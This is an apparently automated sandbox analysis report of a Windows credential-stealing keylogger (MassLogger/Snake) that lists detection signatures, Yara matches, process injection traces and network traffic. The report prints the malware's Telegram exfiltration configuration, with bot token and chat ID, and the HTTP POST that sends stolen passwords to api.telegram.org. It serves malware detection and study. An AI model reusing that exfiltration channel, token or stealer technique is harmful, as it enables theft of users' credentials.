Windows Analysis Report
njVvgA8pEB.exe

Overview

General Information

Sample name: njVvgA8pEB.exe (renamed because the original name is a hash value)
Original sample name: d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c.exe
Analysis ID: 1588596
MD5: d689d0763faaa679d5df32a3c14f9708
SHA1: 928a1e168d684e9a1179d6c023e52cb33da1c26b
SHA256: d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c
Tags: exe, MassLogger, user-adrian__luca

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shut down / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • njVvgA8pEB.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: D689D0763FAAA679D5DF32A3C14F9708)
    • RegSvcs.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • njVvgA8pEB.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: D689D0763FAAA679D5DF32A3C14F9708)
      • RegSvcs.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}
Source | Rule | Description | Author
00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings:
  • 0x1c7d9:$a1: get_encryptedPassword
  • 0x1c7ad:$a2: get_encryptedUsername
  • 0x1c871:$a3: get_timePasswordChanged
  • 0x1c789:$a4: get_passwordField
  • 0x1c7ef:$a5: set_encryptedPassword
  • 0x1c5bc:$a7: get_logins
  • 0x1bb2e:$a8: GetOutlookPasswords
  • 0x1b042:$a9: StartKeylogger
  • 0x19aa3:$a10: KeyLoggerEventArgs
  • 0x19a72:$a11: KeyLoggerEventArgsEventHandler
  • 0x1c690:$a13: _encryptedPassword
(truncated; 28 entries in the full report)
Source | Rule | Description | Author
3.2.RegSvcs.exe.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Matched strings:
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 89 88 44 24 2B 88 44 24 2F B0 75 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
0.2.njVvgA8pEB.exe.ff0000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Matched strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 89 88 44 24 2B 88 44 24 2F B0 75 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Matched strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 89 88 44 24 2B 88 44 24 2F B0 75 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.4295570.6.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
3.2.RegSvcs.exe.4295570.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(truncated; 95 entries in the full report)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T02:55:29.319000+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
2025-01-11T02:55:22.058287+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 158.101.44.242 | 80 | TCP
2025-01-11T02:55:28.308297+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 158.101.44.242 | 80 | TCP
2025-01-11T02:55:29.019529+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}
Source: RegSvcs.exe.7300.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}
Source: njVvgA8pEB.exe | Virustotal: Detection: 61%
Source: njVvgA8pEB.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: njVvgA8pEB.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: njVvgA8pEB.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0037445A
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037C6D1 FindFirstFileW,FindClose | 0_2_0037C6D1
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0037C75C
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0037EF95
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0037F0F2
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0037F3F3
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_003737EF
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00373B12
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0037BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 3_2_011DE0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0324F181h | 3_2_0324EED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0324F8D7h | 3_2_0324F4B8

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49732 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49732 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.4:63099 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1  Host: reallyfreegeoip.org  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1  Content-Type: multipart/form-data; boundary================8dd31b91c731df5  Host: api.telegram.org  Content-Length: 1090  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 158.101.44.242:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)  Host: checkip.dyndns.org  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)  Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_003822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_003822EE
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1  Content-Type: multipart/form-data; boundary================8dd31b91c731df5  Host: api.telegram.org  Content-Length: 1090  Connection: Keep-Alive
Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003370000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.4187157369.00000000032F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.4189028635.0000000005882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsXWx
Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000339D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.4187157369.00000000032F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437
Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00384164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00384164
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00383F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00383F66
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0037001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_0037001C
Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0039CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0039CABC

              System Summary

              barindex
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.njVvgA8pEB.exe.ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 2.2.njVvgA8pEB.exe.1400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
